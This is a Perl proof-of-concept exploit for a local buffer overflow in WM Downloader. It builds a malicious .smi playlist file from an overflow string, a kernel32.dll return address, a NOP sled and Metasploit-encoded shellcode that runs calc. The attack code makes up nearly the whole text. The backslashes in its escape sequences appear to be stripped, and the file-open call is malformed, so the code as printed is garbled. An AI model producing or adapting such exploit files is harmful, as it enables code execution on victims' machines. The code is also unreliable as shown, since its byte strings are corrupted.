WM Downloader (.Smi/ .Ram/ .pls/ .smil/ .wax/ .wpl File) Local Buffer Overflow Exploit

#!/usr/bin/perl
#[+] Bug : WM Downloader (.Smi/ .Ram/ .pls/ .smil/ .wax/ .wpl File) Local Buffer Overflow Exploit
#[+] Author : the_Edit0r
# Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP3 
#[+] Big thnx: Expl0iters.ir  * Anti-security.ir
#########################################################

#EAX 00000001
#ECX 41414141
#EDX 00ED0000
#EBX 00383E30 ASCII "C:Documents and SettingsAdministratorDesktopEdit0r.smi"
#ESP 000F739C
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414141

##########################################################

my $EIP="http://"."x41x41x41" x 8707;
my $ret="x7Bx46x86x7c"; # kernel32.dll
my $nop="x90" x 20;

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x26".
"xacxdfx53x83xebxfcxe2xf4xdax44x9bx53x26xacx54x16".
"x1ax27xa3x56x5exadx30xd8x69xb4x54x0cx06xadx34x1a".
"xadx98x54x52xc8x9dx1fxcax8ax28x1fx27x21x6dx15x5e".
"x27x6ex34xa7x1dxf8xfbx57x53x49x54x0cx02xadx34x35".
"xadxa0x94xd8x79xb0xdexb8xadxb0x54x52xcdx25x83x77".
"x22x6fxeex93x42x27x9fx63xa3x6cxa7x5fxadxecxd3xd8".
"x56xb0x72xd8x4exa4x34x5axadx2cx6fx53x26xacx54x3b".
"x1axf3xeexa5x46xfax56xabxa5x6cxa4x03x4ex5cx55x57".
"x79xc4x47xadxacxa2x88xacxc1xcfxbex3fx45xacxdfx53";

open(MYFILE,>>Edit0r.smi);
print MYFILE $EIP.$ret.$nop.$shellcode;
close(MYFILE);
print "File Created successfully
";

############################################################